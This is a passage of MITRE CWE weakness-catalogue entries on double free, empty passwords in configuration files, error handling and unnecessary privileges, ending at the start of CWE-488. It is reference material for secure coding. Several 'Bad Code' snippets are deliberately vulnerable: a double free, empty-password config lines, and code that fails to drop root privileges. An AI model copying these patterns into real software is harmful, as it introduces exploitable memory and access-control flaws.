    free(buf2R1); /* second free of buf2R1: the double free */
    free(buf1R2);
    return 0;
}
+ Observed Examples
Reference | Description
Chain: Signal handler contains too much functionality (CWE-828), introducing a race condition that leads to a double free (CWE-415).
Double free resultant from certain error conditions.
Double free resultant from certain error conditions.
Double free resultant from certain error conditions.
Double free from invalid ASN.1 encoding.
Double free from malformed GIF.
Double free from malformed GIF.
Double free from malformed compressed data.
+ Potential Mitigations

Phase: Architecture and Design

Choose a language that provides automatic memory management.

Phase: Implementation

Ensure that each allocation is freed only once. After freeing a chunk, set the pointer to NULL to ensure the pointer cannot be freed again. In complicated error conditions, be sure that clean-up routines respect the state of allocation properly. If the language is object oriented, ensure that object destructors delete each chunk of memory only once.

Phase: Implementation

Use a static analysis tool to find double free instances.

+ Relationships
Nature | Type | ID | Name | View(s)
ChildOf | Weakness Class | 398 | Indicator of Poor Code Quality | Seven Pernicious Kingdoms (primary) 700
ChildOf | Category | 399 | Resource Management Errors | Development Concepts (primary) 699; Weaknesses for Simplified Mapping of Published Vulnerabilities (primary) 1003
ChildOf | Category | 633 | Weaknesses that Affect Memory | Resource-specific Weaknesses (primary) 631
ChildOf | Weakness Base | 666 | Operation on Resource in Wrong Phase of Lifetime | Research Concepts 1000
ChildOf | Weakness Class | 675 | Duplicate Operations on Resource | Research Concepts 1000
ChildOf | Category | 742 | CERT C Secure Coding Section 08 - Memory Management (MEM) | Weaknesses Addressed by the CERT C Secure Coding Standard (primary) 734
ChildOf | Weakness Base | 825 | Expired Pointer Dereference | Research Concepts (primary) 1000
ChildOf | Category | 876 | CERT C++ Secure Coding Section 08 - Memory Management (MEM) | Weaknesses Addressed by the CERT C++ Secure Coding Standard (primary) 868
ChildOf | Category | 969 | SFP Secondary Cluster: Faulty Memory Release | Software Fault Pattern (SFP) Clusters (primary) 888
PeerOf | Weakness Base | 123 | Write-what-where Condition | Research Concepts 1000
PeerOf | Weakness Base | 416 | Use After Free | Development Concepts 699; Research Concepts 1000
MemberOf | View | 630 | Weaknesses Examined by SAMATE | Weaknesses Examined by SAMATE (primary) 630
CanFollow | Weakness Base | 364 | Signal Handler Race Condition | Research Concepts 1000
+ Relationship Notes

This is usually resultant from another weakness, such as an unhandled error or race condition between threads. It could also be primary to weaknesses such as buffer overflows.

+ Affected Resources
  • Memory
+ Taxonomy Mappings
Mapped Taxonomy Name | Node ID | Fit | Mapped Node Name
PLOVER |  |  | DFREE - Double-Free Vulnerability
7 Pernicious Kingdoms |  |  | Double Free
CLASP |  |  | Doubly freeing memory
CERT C Secure Coding | MEM00-C |  | Allocate and free memory in the same module, at the same level of abstraction
CERT C Secure Coding | MEM01-C |  | Store a new value in pointers immediately after free()
CERT C Secure Coding | MEM31-C |  | Free dynamically allocated memory exactly once
CERT C++ Secure Coding | MEM01-CPP |  | Store a valid value in pointers immediately after deallocation
CERT C++ Secure Coding | MEM31-CPP |  | Free dynamically allocated memory exactly once
Software Fault Patterns | SFP12 |  | Faulty Memory Release
+ White Box Definitions

A weakness where a code path has:

1. a start statement that relinquishes a dynamically allocated memory resource

2. an end statement that relinquishes the same dynamically allocated memory resource

+ References
[REF-17] Michael Howard, David LeBlanc and John Viega. "24 Deadly Sins of Software Security". "Sin 8: C++ Catastrophes." Page 143. McGraw-Hill. 2010.
[REF-7] Mark Dowd, John McDonald and Justin Schuh. "The Art of Software Security Assessment". Chapter 7, "Double Frees", Page 379. 1st Edition. Addison Wesley. 2006.
+ Maintenance Notes

It could be argued that Double Free would be most appropriately located as a child of "Use after Free", but "Use" and "Release" are considered to be distinct operations within vulnerability theory, therefore this is more accurately "Release of a Resource after Expiration or Release", which doesn't exist yet.

+ Content History
Submissions
Submission DateSubmitterOrganizationSource
PLOVERExternally Mined
Modifications
Modification DateModifierOrganizationSource
2008-07-01Eric DalciCigitalExternal
updated Potential_Mitigations, Time_of_Introduction
2008-08-01KDM AnalyticsExternal
added/updated white box definitions
2008-09-08CWE Content TeamMITREInternal
updated Applicable_Platforms, Common_Consequences, Description, Maintenance_Notes, Relationships, Other_Notes, Relationship_Notes, Taxonomy_Mappings
2008-11-24CWE Content TeamMITREInternal
updated Relationships, Taxonomy_Mappings
2009-05-27CWE Content TeamMITREInternal
updated Demonstrative_Examples
2009-10-29CWE Content TeamMITREInternal
updated Other_Notes
2010-09-27CWE Content TeamMITREInternal
updated Relationships
2010-12-13CWE Content TeamMITREInternal
updated Observed_Examples, Relationships
2011-06-01CWE Content TeamMITREInternal
updated Common_Consequences
2011-09-13CWE Content TeamMITREInternal
updated Relationships, Taxonomy_Mappings
2012-05-11CWE Content TeamMITREInternal
updated References, Relationships
2014-07-30CWE Content TeamMITREInternal
updated Relationships, Taxonomy_Mappings
2015-12-07CWE Content TeamMITREInternal
updated Relationships

CWE-258: Empty Password in Configuration File

Weakness ID: 258
Abstraction: Variant
Status: Incomplete
+ Description

Description Summary

Using an empty string as a password is insecure.
+ Time of Introduction
  • Architecture and Design
  • Implementation
  • Operation
+ Applicable Platforms

Languages

All

+ Common Consequences
Scope | Effect
Access Control

Technical Impact: Gain privileges / assume identity

+ Likelihood of Exploit

Very High

+ Demonstrative Examples

Example 1

The following examples show a portion of properties and configuration files for Java and ASP.NET applications. The files include username and password information but the password is provided as an empty string.

This Java example shows a properties file with an empty password string.

(Bad Code)
Example Language: Java 
# Java Web App ResourceBundle properties file
...
webapp.ldap.username=secretUsername
webapp.ldap.password=
...

The following example shows a portion of a configuration file for an ASP.NET application. This configuration file includes username and password information for a database connection, but the password is provided as an empty string.

(Bad Code)
Example Language: ASP.NET 
...
<connectionStrings>
<add name="ud_DEV" connectionString="connectDB=uDB; uid=db2admin; pwd=; dbalias=uDB;" providerName="System.Data.Odbc" />
</connectionStrings>
...

An empty string should never be used as a password as this can allow unauthorized access to the application. Username and password information should not be included in a configuration file or a properties file in clear text. If possible, encrypt this information and avoid CWE-260 and CWE-13.
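
One way to reduce exposure is to validate the configuration at startup and refuse to run when the password is missing or empty. The following sketch assumes the property names from the Java example above; the class name and file path handling are illustrative only.

(Good Code)
Example Language: Java 
import java.io.FileInputStream;
import java.io.IOException;
import java.util.Properties;

public class LdapConfig {

    // Illustrative loader: rejects a missing or empty password (CWE-258).
    public static Properties load(String path) throws IOException {
        Properties props = new Properties();
        try (FileInputStream in = new FileInputStream(path)) {
            props.load(in);
        }
        String password = props.getProperty("webapp.ldap.password");
        if (password == null || password.trim().isEmpty()) {
            throw new IllegalStateException("webapp.ldap.password must not be empty");
        }
        return props;
    }
}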

+ Potential Mitigations

Phase: System Configuration

Passwords should be at least eight characters long -- the longer the better. Avoid passwords that are in any way similar to other passwords you have. Avoid using words that may be found in a dictionary, a book of names, or on a map. Consider incorporating numbers and/or punctuation into your password. If you do use common words, consider replacing some letters with numbers and punctuation, but avoid predictable "similar-looking" substitutions: for example, it is not a good idea to change cat to c@t, ca+, (@+, or anything similar. Finally, it is never appropriate to use an empty string as a password.

+ Weakness Ordinalities
Ordinality | Description
Primary
(where the weakness exists independent of other weaknesses)
+ Relationships
Nature | Type | ID | Name | View(s)
ChildOf | Category | 254 | Security Features | Seven Pernicious Kingdoms (primary) 700
ChildOf | Weakness Variant | 260 | Password in Configuration File | Development Concepts (primary) 699; Research Concepts (primary) 1000
ChildOf | Weakness Base | 521 | Weak Password Requirements | Research Concepts 1000
ChildOf | Category | 950 | SFP Secondary Cluster: Hardcoded Sensitive Data | Software Fault Pattern (SFP) Clusters (primary) 888
+ Causal Nature

Explicit

+ Taxonomy Mappings
Mapped Taxonomy Name | Node ID | Fit | Mapped Node Name
7 Pernicious Kingdoms |  |  | Password Management: Empty Password in Configuration File
+ References
[REF-9] John Viega and Gary McGraw. "Building Secure Software: How to Avoid Security Problems the Right Way". 1st Edition. Addison-Wesley. 2002.
+ Content History
Submissions
Submission DateSubmitterOrganizationSource
7 Pernicious KingdomsExternally Mined
Modifications
Modification DateModifierOrganizationSource
2008-07-01Eric DalciCigitalExternal
updated Time_of_Introduction
2008-09-08CWE Content TeamMITREInternal
updated Relationships, Other_Notes, Taxonomy_Mappings, Weakness_Ordinalities
2009-10-29CWE Content TeamMITREInternal
updated Other_Notes, Potential_Mitigations
2010-12-13CWE Content TeamMITREInternal
updated Demonstrative_Examples
2011-06-01CWE Content TeamMITREInternal
updated Common_Consequences
2012-05-11CWE Content TeamMITREInternal
updated References, Relationships
2013-02-21CWE Content TeamMITREInternal
updated Potential_Mitigations
2014-07-30CWE Content TeamMITREInternal
updated Relationships

CWE CATEGORY: Environment

Category ID: 2
Status: Draft
+ Description

Description Summary

Weaknesses in this category are typically introduced during unexpected environmental conditions.
+ Relationships
NatureTypeIDNameView(s) this relationship pertains toView(s)
ChildOfCategoryCategory933OWASP Top Ten 2013 Category A5 - Security Misconfiguration
Weaknesses in OWASP Top Ten (2013) (primary)928
ParentOfWeakness VariantWeakness Variant5J2EE Misconfiguration: Data Transmission Without Encryption
Seven Pernicious Kingdoms (primary)700
ParentOfWeakness VariantWeakness Variant6J2EE Misconfiguration: Insufficient Session-ID Length
Seven Pernicious Kingdoms (primary)700
ParentOfWeakness VariantWeakness Variant7J2EE Misconfiguration: Missing Custom Error Page
Seven Pernicious Kingdoms (primary)700
ParentOfWeakness VariantWeakness Variant8J2EE Misconfiguration: Entity Bean Declared Remote
Seven Pernicious Kingdoms (primary)700
ParentOfWeakness VariantWeakness Variant9J2EE Misconfiguration: Weak Access Permissions for EJB Methods
Seven Pernicious Kingdoms (primary)700
ParentOfWeakness VariantWeakness Variant11ASP.NET Misconfiguration: Creating Debug Binary
Seven Pernicious Kingdoms (primary)700
ParentOfWeakness VariantWeakness Variant12ASP.NET Misconfiguration: Missing Custom Error Page
Seven Pernicious Kingdoms (primary)700
ParentOfWeakness VariantWeakness Variant13ASP.NET Misconfiguration: Password in Configuration File
Seven Pernicious Kingdoms (primary)700
ParentOfWeakness BaseWeakness Base14Compiler Removal of Code to Clear Buffers
Seven Pernicious Kingdoms (primary)700
ParentOfWeakness ClassWeakness Class435Interaction Error
Weaknesses for Simplified Mapping of Published Vulnerabilities (primary)1003
MemberOfViewView700Seven Pernicious Kingdoms
Seven Pernicious Kingdoms (primary)700
MemberOfViewView1003Weaknesses for Simplified Mapping of Published Vulnerabilities
Weaknesses for Simplified Mapping of Published Vulnerabilities (primary)1003
+ Maintenance Notes

This entry is being considered for deprecation. It was originally used for organizing the Development View (CWE-699), but it introduced unnecessary complexity and depth to the resulting tree. It cannot be deprecated until after the CWE team has reviewed whether other CWE elements are appropriately capturing the "location" in which the weaknesses are introduced.

+ Content History
Modifications
Modification DateModifierOrganizationSource
2008-09-08CWE Content TeamMITREInternal
updated Relationships
2013-07-17CWE Content TeamMITREInternal
updated Relationships
2015-12-07CWE Content TeamMITREInternal
updated Relationships
2017-01-19CWE Content TeamMITREInternal
updated Maintenance_Notes, Relationships

CWE CATEGORY: Error Handling

Category ID: 388
Status: Draft
+ Description

Description Summary

This category includes weaknesses that occur when an application does not properly handle errors that occur during processing.

Extended Description

An attacker may discover this type of error, since such errors can often be forced by submitting a variety of corrupt input.

+ Common Consequences
Scope | Effect
Integrity
Confidentiality

Technical Impact: Read application data; Modify files or directories

Generally, the consequences of improper error handling are the disclosure of the internal workings of the application to the attacker, providing details to use in further attacks. Web applications that do not properly handle error conditions frequently generate error messages such as stack traces, detailed diagnostics, and other inner details of the application.

+ Demonstrative Examples

Example 1

In the snippet below, an unchecked runtime exception thrown from within the try block may cause the container to display its default error page (which may contain a full stack trace, among other things).

(Bad Code)
Example Language: Java 
public void doPost(HttpServletRequest request, HttpServletResponse response) throws ServletException, IOException {
    try {
        ...
    }
    catch (ApplicationSpecificException ase) {
        logger.error("Caught: " + ase.toString());
    }
}
+ Potential Mitigations

Use a standard exception handling mechanism to be sure that your application properly handles all types of processing errors. All error messages sent to the user should contain as little detail as necessary to explain what happened.

If the error was caused by unexpected and likely malicious input, it may be appropriate to send the user no error message other than a simple "could not process the request" response.

The details of the error and its cause should be recorded in a detailed diagnostic log for later analysis. Do not allow the application to throw errors up to the application container, generally the web application server.

Be sure that the container is properly configured to handle errors if you choose to let any errors propagate up to it.
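
A minimal sketch of such a standard handler is shown below; the logger and the processRequest() helper are assumed rather than taken from any particular framework. Full detail goes to the server-side diagnostic log, and the user receives only a generic message.

(Good Code)
Example Language: Java 
public void doPost(HttpServletRequest request, HttpServletResponse response) throws IOException {
    try {
        processRequest(request, response); // application-specific work (assumed helper)
    }
    catch (Exception e) {
        // Record the full detail in the server-side diagnostic log only.
        logger.error("Request processing failed", e);
        // Send the user a minimal, generic message rather than a stack trace or diagnostics.
        response.sendError(HttpServletResponse.SC_INTERNAL_SERVER_ERROR, "Could not process the request");
    }
}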

+ Relationships
Nature | Type | ID | Name | View(s)
ChildOf | Category | 18 | Source Code | Weaknesses for Simplified Mapping of Published Vulnerabilities (primary) 1003
ChildOf | Category | 728 | OWASP Top Ten 2004 Category A7 - Improper Error Handling | Weaknesses in OWASP Top Ten (2004) (primary) 711
ParentOf | Category | 389 | Error Conditions, Return Values, Status Codes | Development Concepts (primary) 699
ParentOf | Weakness Base | 391 | Unchecked Error Condition | Seven Pernicious Kingdoms (primary) 700
ParentOf | Weakness Base | 395 | Use of NullPointerException Catch to Detect NULL Pointer Dereference | Seven Pernicious Kingdoms (primary) 700
ParentOf | Weakness Base | 396 | Declaration of Catch for Generic Exception | Seven Pernicious Kingdoms (primary) 700
ParentOf | Weakness Base | 397 | Declaration of Throws for Generic Exception | Seven Pernicious Kingdoms (primary) 700
ParentOf | Weakness Base | 544 | Missing Standardized Error Handling Mechanism | Development Concepts (primary) 699
ParentOf | Weakness Base | 600 | Uncaught Exception in Servlet | Development Concepts (primary) 699
ParentOf | Weakness Variant | 617 | Reachable Assertion | Development Concepts 699
ParentOf | Weakness Class | 636 | Not Failing Securely ('Failing Open') | Development Concepts 699
ParentOf | Weakness Class | 703 | Improper Check or Handling of Exceptional Conditions | Development Concepts (primary) 699
ParentOf | Weakness Class | 754 | Improper Check for Unusual or Exceptional Conditions | Weaknesses for Simplified Mapping of Published Vulnerabilities (primary) 1003
ParentOf | Weakness Class | 756 | Missing Custom Error Page | Development Concepts (primary) 699
MemberOf | View | 699 | Development Concepts | Development Concepts (primary) 699
MemberOf | View | 700 | Seven Pernicious Kingdoms | Seven Pernicious Kingdoms (primary) 700
PeerOf | Weakness Base | 619 | Dangling Database Cursor ('Cursor Injection') | Research Concepts 1000
+ Taxonomy Mappings
Mapped Taxonomy Name | Node ID | Fit | Mapped Node Name
7 Pernicious Kingdoms |  |  | Error Handling
OWASP Top Ten 2004 | A7 | CWE More Specific | Improper Error Handling
+ References
[REF-17] Michael Howard, David LeBlanc and John Viega. "24 Deadly Sins of Software Security". "Sin 11: Failure to Handle Errors Correctly." Page 183. McGraw-Hill. 2010.
+ Content History
Submissions
Submission DateSubmitterOrganizationSource
7 Pernicious KingdomsExternally Mined
Modifications
Modification DateModifierOrganizationSource
2008-07-01Sean EidemillerCigitalExternal
added/updated demonstrative examples
2008-09-08CWE Content TeamMITREInternal
updated Common_Consequences, Description, Relationships, Taxonomy_Mappings
2008-10-14CWE Content TeamMITREInternal
updated Description
2009-03-10CWE Content TeamMITREInternal
updated Relationships
2009-10-29CWE Content TeamMITREInternal
updated Common_Consequences
2010-02-16CWE Content TeamMITREInternal
updated Relationships
2010-04-05CWE Content TeamMITREInternal
updated Related_Attack_Patterns
2011-06-01CWE Content TeamMITREInternal
updated Common_Consequences
2012-05-11CWE Content TeamMITREInternal
updated References
2015-12-07CWE Content TeamMITREInternal
updated Relationships
2017-01-19CWE Content TeamMITREInternal
updated Relationships

CWE-250: Execution with Unnecessary Privileges

Weakness ID: 250
Abstraction: Class
Status: Draft
+ Description

Description Summary

The software performs an operation at a privilege level that is higher than the minimum level required, which creates new weaknesses or amplifies the consequences of other weaknesses.

Extended Description

New weaknesses can be exposed because running with extra privileges, such as root or Administrator, can disable the normal security checks being performed by the operating system or surrounding environment. Other pre-existing weaknesses can turn into security vulnerabilities if they occur while operating at raised privileges.

Privilege management functions can behave in some less-than-obvious ways, and they have different quirks on different platforms. These inconsistencies are particularly pronounced if you are transitioning from one non-root user to another. Signal handlers and spawned processes run at the privilege of the owning process, so if a process is running as root when a signal fires or a sub-process is executed, the signal handler or sub-process will operate with root privileges.

+ Time of Introduction
  • Installation
  • Architecture and Design
  • Operation
+ Applicable Platforms

Languages

Language-independent

Architectural Paradigms

Mobile Application

+ Modes of Introduction

If an application has this design problem, then it can be easier for the developer to make implementation-related errors such as CWE-271 (Privilege Dropping / Lowering Errors). In addition, the consequences of Privilege Chaining (CWE-268) can become more severe.

+ Common Consequences
Scope | Effect
Confidentiality
Integrity
Availability
Access Control

Technical Impact: Gain privileges / assume identity; Execute unauthorized code or commands; Read application data; DoS: crash / exit / restart

An attacker will be able to gain access to any resources that are allowed by the extra privileges. Common results include executing code, disabling services, and reading restricted data.

+ Likelihood of Exploit

Medium

+ Detection Methods

Manual Analysis

This weakness can be detected using tools and techniques that require manual (human) analysis, such as penetration testing, threat modeling, and interactive tools that allow the tester to record and modify an active session.

These may be more effective than strictly automated techniques. This is especially the case with weaknesses that are related to design and business rules.

Black Box

Use monitoring tools that examine the software's process as it interacts with the operating system and the network. This technique is useful in cases when source code is unavailable, if the software was not developed by you, or if you want to verify that the build phase did not introduce any new weaknesses. Examples include debuggers that directly attach to the running process; system-call tracing utilities such as truss (Solaris) and strace (Linux); system activity monitors such as FileMon, RegMon, Process Monitor, and other Sysinternals utilities (Windows); and sniffers and protocol analyzers that monitor network traffic.

Attach the monitor to the process and perform a login. Look for library functions and system calls that indicate when privileges are being raised or dropped. Look for accesses of resources that are restricted to normal users.

Note that this technique is only useful for privilege issues related to system resources. It is not likely to detect application-level business rules that are related to privileges, such as if a blog system allows a user to delete a blog entry without first checking that the user has administrator privileges.

Automated Static Analysis - Binary / Bytecode

According to SOAR, the following detection techniques may be useful:

Highly cost effective:

  • Compare binary / bytecode to application permission manifest

Cost effective for partial coverage:

  • Bytecode Weakness Analysis - including disassembler + source code weakness analysis

  • Binary Weakness Analysis - including disassembler + source code weakness analysis

Effectiveness: SOAR High

Manual Static Analysis - Binary / Bytecode

According to SOAR, the following detection techniques may be useful:

Cost effective for partial coverage:

  • Binary / Bytecode disassembler - then use manual analysis for vulnerabilities & anomalies

Effectiveness: SOAR Partial

Dynamic Analysis with automated results interpretation

According to SOAR, the following detection techniques may be useful:

Cost effective for partial coverage:

  • Host-based Vulnerability Scanners - examine the configuration for flaws, verify that audit mechanisms work, and ensure that the host configuration meets predefined criteria

Effectiveness: SOAR Partial

Dynamic Analysis with manual results interpretation

According to SOAR, the following detection techniques may be useful:

Cost effective for partial coverage:

  • Host Application Interface Scanner

Effectiveness: SOAR Partial

Manual Static Analysis - Source Code

According to SOAR, the following detection techniques may be useful:

Highly cost effective:

  • Manual Source Code Review (not inspections)

Cost effective for partial coverage:

  • Focused Manual Spotcheck - Focused manual analysis of source

Effectiveness: SOAR High

Automated Static Analysis - Source Code

According to SOAR, the following detection techniques may be useful:

Cost effective for partial coverage:

  • Source code Weakness Analyzer

  • Context-configured Source Code Weakness Analyzer

Effectiveness: SOAR Partial

Automated Static Analysis

According to SOAR, the following detection techniques may be useful:

Cost effective for partial coverage:

  • Configuration Checker

  • Permission Manifest Analysis

Effectiveness: SOAR Partial

Architecture / Design Review

According to SOAR, the following detection techniques may be useful:

Highly cost effective:

  • Inspection (IEEE 1028 standard) (can apply to requirements, design, source code, etc.)

  • Formal Methods / Correct-By-Construction

Cost effective for partial coverage:

  • Attack Modeling

Effectiveness: SOAR High

+ Demonstrative Examples

Example 1

This code temporarily raises the program's privileges to allow creation of a new user folder.

(Bad Code)
Example Language: Python 
def makeNewUserDir(username):
    if invalidUsername(username):
        # avoid CWE-22 and CWE-78
        print('Usernames cannot contain invalid characters')
        return False

    try:
        raisePrivileges()
        os.mkdir('/home/' + username)
        lowerPrivileges()
    except OSError:
        print('Unable to create new user directory for user:' + username)
        return False

    return True

While the program only raises its privilege level to create the folder and immediately lowers it again, if the call to os.mkdir() throws an exception, the call to lowerPrivileges() will not occur. As a result, the program is indefinitely operating in a raised privilege state, possibly allowing further exploitation to occur.
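
One way to avoid this pitfall, sketched here in Java rather than Python, is to perform the privilege drop in a finally block so that it runs even when directory creation fails. The raisePrivileges(), lowerPrivileges(), and invalidUsername() helpers are hypothetical, mirroring the example above, and the java.nio.file imports are omitted.

(Good Code)
Example Language: Java 
public boolean makeNewUserDir(String username) {
    if (invalidUsername(username)) { // avoid CWE-22 and CWE-78 (assumed helper, as above)
        System.out.println("Usernames cannot contain invalid characters");
        return false;
    }
    raisePrivileges(); // hypothetical helper, as in the example above
    try {
        Files.createDirectory(Paths.get("/home", username));
    } catch (IOException e) {
        System.out.println("Unable to create new user directory for user: " + username);
        return false;
    } finally {
        lowerPrivileges(); // always executed, even if createDirectory() throws
    }
    return true;
}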

Example 2

The following code calls chroot() to restrict the application to a subset of the filesystem below APP_HOME in order to prevent an attacker from using the program to gain unauthorized access to files located elsewhere. The code then opens a file specified by the user and processes the contents of the file.

(Bad Code)
Example Language: C 
chroot(APP_HOME);
chdir("/");
FILE* data = fopen(argv[1], "r+");
...

Constraining the process inside the application's home directory before opening any files is a valuable security measure. However, the absence of a call to setuid() with some non-zero value means the application is continuing to operate with unnecessary root privileges. Any successful exploit carried out by an attacker against the application can now result in a privilege escalation attack because any malicious operations will be performed with the privileges of the superuser. If the application drops to the privilege level of a non-root user, the potential for damage is substantially reduced.

Example 3

This application intends to use a user's location to determine the timezone the user is in:

(Bad Code)
Example Language: Java 
locationClient = new LocationClient(this, this, this);
locationClient.connect();
Location userCurrLocation;
userCurrLocation = locationClient.getLastLocation();
setTimeZone(userCurrLocation);

This is an unnecessary use of the location API: the time zone is already available through the Android Time API. Always be sure there is no other way to obtain the needed information before resorting to the location API.

Example 4

This code uses location to determine the user's current US State location.

First the application must declare that it requires the ACCESS_FINE_LOCATION permission in the application's manifest.xml:

(Bad Code)
Example Language: XML 
<uses-permission android:name="android.permission.ACCESS_FINE_LOCATION"/>

During execution, a call to getLastLocation() will return a location based on the application's location permissions. In this case the application has permission for the most accurate location possible:

(Bad Code)
Example Language: Java 
locationClient = new LocationClient(this, this, this);
locationClient.connect();
Location userCurrLocation;
userCurrLocation = locationClient.getLastLocation();
deriveStateFromCoords(userCurrLocation);

While the application needs this information, it does not need to use the ACCESS_FINE_LOCATION permission, as the ACCESS_COARSE_LOCATION permission will be sufficient to identify which US state the user is in.

+ Observed Examples
Reference | Description
FTP client program on a certain OS runs with setuid privileges and has a buffer overflow. Most clients do not need extra privileges, so an overflow is not a vulnerability for those clients.
Program runs with privileges and calls another program with the same privileges, which allows read of arbitrary files.
OS incorrectly installs a program with setuid privileges, allowing users to gain privileges.
Composite: application running with high privileges allows user to specify a restricted file to process, which generates a parsing error that leaks the contents of the file.
Program does not drop privileges before calling another program, allowing code execution.
setuid root program allows creation of arbitrary files through command line argument.
Installation script installs some programs as setuid when they shouldn't be.
+ Potential Mitigations

Phases: Architecture and Design; Operation

Strategy: Environment Hardening

Run your code using the lowest privileges that are required to accomplish the necessary tasks [R.250.2]. If possible, create isolated accounts with limited privileges that are only used for a single task. That way, a successful attack will not immediately give the attacker access to the rest of the software or its environment. For example, database applications rarely need to run as the database administrator, especially in day-to-day operations.

Phase: Architecture and Design

Strategies: Separation of Privilege; Identify and Reduce Attack Surface

Identify the functionality that requires additional privileges, such as access to privileged operating system resources. Wrap and centralize this functionality if possible, and isolate the privileged code as much as possible from other code [R.250.2]. Raise privileges as late as possible, and drop them as soon as possible to avoid CWE-271. Avoid weaknesses such as CWE-288 and CWE-420 by protecting all possible communication channels that could interact with the privileged code, such as a secondary socket that is only intended to be accessed by administrators.

Phase: Implementation

Perform extensive input validation for any privileged code that must be exposed to the user and reject anything that does not fit your strict requirements.

Phase: Implementation

When dropping privileges, ensure that they have been dropped successfully to avoid CWE-273. As protection mechanisms in the environment get stronger, privilege-dropping calls may fail even if it seems like they would always succeed.

Phase: Implementation

If circumstances force you to run with extra privileges, then determine the minimum access level necessary. First identify the different permissions that the software and its users will need to perform their actions, such as file read and write permissions, network socket permissions, and so forth. Then explicitly allow those actions while denying all else [R.250.2]. Perform extensive input validation and canonicalization to minimize the chances of introducing a separate vulnerability. This mitigation is much more prone to error than dropping the privileges in the first place.

Phases: Operation; System Configuration

Strategy: Environment Hardening

Ensure that the software runs properly under the Federal Desktop Core Configuration (FDCC) [R.250.4] or an equivalent hardening configuration guide, which many organizations use to limit the attack surface and potential risk of deployed software.

+ Relationships
Nature | Type | ID | Name | View(s)
ChildOf | Weakness Class | 227 | Improper Fulfillment of API Contract ('API Abuse') | Development Concepts (primary) 699; Seven Pernicious Kingdoms (primary) 700
ChildOf | Category | 265 | Privilege / Sandbox Issues | Development Concepts 699
ChildOf | Weakness Base | 269 | Improper Privilege Management | Research Concepts 1000
ChildOf | Weakness Class | 657 | Violation of Secure Design Principles | Development Concepts 699; Research Concepts (primary) 1000
ChildOf | Category | 753 | 2009 Top 25 - Porous Defenses | Weaknesses in the 2009 CWE/SANS Top 25 Most Dangerous Programming Errors (primary) 750
ChildOf | Category | 815 | OWASP Top Ten 2010 Category A6 - Security Misconfiguration | Weaknesses in OWASP Top Ten (2010) (primary) 809
ChildOf | Category | 858 | CERT Java Secure Coding Section 13 - Serialization (SER) | Weaknesses Addressed by the CERT Java Secure Coding Standard (primary) 844
ChildOf | Category | 866 | 2011 Top 25 - Porous Defenses | Weaknesses in the 2011 CWE/SANS Top 25 Most Dangerous Software Errors (primary) 900
ChildOf | Category | 901 | SFP Primary Cluster: Privilege | Software Fault Pattern (SFP) Clusters (primary) 888
MemberOf | View | 884 | CWE Cross-section | CWE Cross-section (primary) 884
+ Relationship Notes

There is a close association with CWE-653 (Insufficient Separation of Privileges). CWE-653 is about providing separate components for each privilege; CWE-250 is about ensuring that each component has the least amount of privileges possible.

+ Taxonomy Mappings
Mapped Taxonomy Name | Node ID | Fit | Mapped Node Name
7 Pernicious Kingdoms |  |  | Often Misused: Privilege Management
CERT Java Secure Coding | SER09-J |  | Minimize privileges before deserializing from a privilege context
+ References
[R.250.1] Jerome H. Saltzer and Michael D. Schroeder. "The Protection of Information in Computer Systems". Proceedings of the IEEE 63. September, 1975. <http://web.mit.edu/Saltzer/www/publications/protection/>.
[R.250.2] [REF-31] Sean Barnum and Michael Gegick. "Least Privilege". 2005-09-14. <https://buildsecurityin.us-cert.gov/daisy/bsi/articles/knowledge/principles/351.html>.
[R.250.3] [REF-11] M. Howard and D. LeBlanc. "Writing Secure Code". Chapter 7, "Running with Least Privilege" Page 207. 2nd Edition. Microsoft. 2002.
[R.250.4] [REF-24] NIST. "Federal Desktop Core Configuration". <http://nvd.nist.gov/fdcc/index.cfm>.
[R.250.5] [REF-17] Michael Howard, David LeBlanc and John Viega. "24 Deadly Sins of Software Security". "Sin 16: Executing Code With Too Much Privilege." Page 243. McGraw-Hill. 2010.
[R.250.6] [REF-7] Mark Dowd, John McDonald and Justin Schuh. "The Art of Software Security Assessment". Chapter 9, "Privilege Vulnerabilities", Page 477. 1st Edition. Addison Wesley. 2006.
+ Maintenance Notes

CWE-271, CWE-272, and CWE-250 are all closely related and possibly overlapping. CWE-271 is probably better suited as a category. Both CWE-272 and CWE-250 are in active use by the community. The "least privilege" phrase has multiple interpretations.

+ Content History
Submissions
Submission DateSubmitterOrganizationSource
7 Pernicious KingdomsExternally Mined
Modifications
Modification DateModifierOrganizationSource
2008-09-08CWE Content TeamMITREInternal
updated Description, Modes_of_Introduction, Relationships, Other_Notes, Relationship_Notes, Taxonomy_Mappings
2008-10-14CWE Content TeamMITREInternal
updated Description, Maintenance_Notes
2009-01-12CWE Content TeamMITREInternal
updated Common_Consequences, Description, Likelihood_of_Exploit, Maintenance_Notes, Name, Observed_Examples, Other_Notes, Potential_Mitigations, Relationships, Time_of_Introduction
2009-03-10CWE Content TeamMITREInternal
updated Potential_Mitigations
2009-05-27CWE Content TeamMITREInternal
updated Related_Attack_Patterns
2010-02-16CWE Content TeamMITREInternal
updated Detection_Factors, Potential_Mitigations, References
2010-06-21CWE Content TeamMITREInternal
updated Detection_Factors, Potential_Mitigations
2011-03-29CWE Content TeamMITREInternal
updated Relationships
2011-06-01CWE Content TeamMITREInternal
updated Common_Consequences, Relationships, Taxonomy_Mappings
2011-06-27CWE Content TeamMITREInternal
updated Demonstrative_Examples, Relationships
2011-09-13CWE Content TeamMITREInternal
updated Potential_Mitigations, References, Relationships
2012-05-11CWE Content TeamMITREInternal
updated References, Related_Attack_Patterns, Relationships
2012-10-30CWE Content TeamMITREInternal
updated Potential_Mitigations
2013-07-17CWE Content TeamMITREInternal
updated Applicable_Platforms
2014-02-18CWE Content TeamMITREInternal
updated Demonstrative_Examples
2014-07-30CWE Content TeamMITREInternal
updated Detection_Factors
Previous Entry Names
Change DatePrevious Entry Name
2008-01-30Often Misused: Privilege Management
2009-01-12Design Principle Violation: Failure to Use Least Privilege

CWE-488: Exposure of Data Element to Wrong Session

Weakness ID: 488
Abstraction: Variant
Status: Draft
+ Description

Description Summary

The product does not sufficiently enforce boundaries between the states of different sessions, causing data to be provided to, or used by, the wrong session.

Extended Description

Data can "bleed" from one session to another through member variables of singleton objects, such as Servlets, and objects from a shared pool.

In the case of Servlets, developers sometimes do not understand that, unless a Servlet implements the SingleThreadModel interface, the Servlet is a singleton; there is only one instance of the Servlet, and that single instance is used and re-used to handle multiple requests that are processed simultaneously by different threads. A common result is that developers use Servlet member fields in such a way that one user may inadvertently see another user's data. In other words, storing user data in Servlet member fields introduces a data access race condition.

+ Time of Introduction
  • Implementation
+ Applicable Platforms

Languages

All

+ Common Consequences
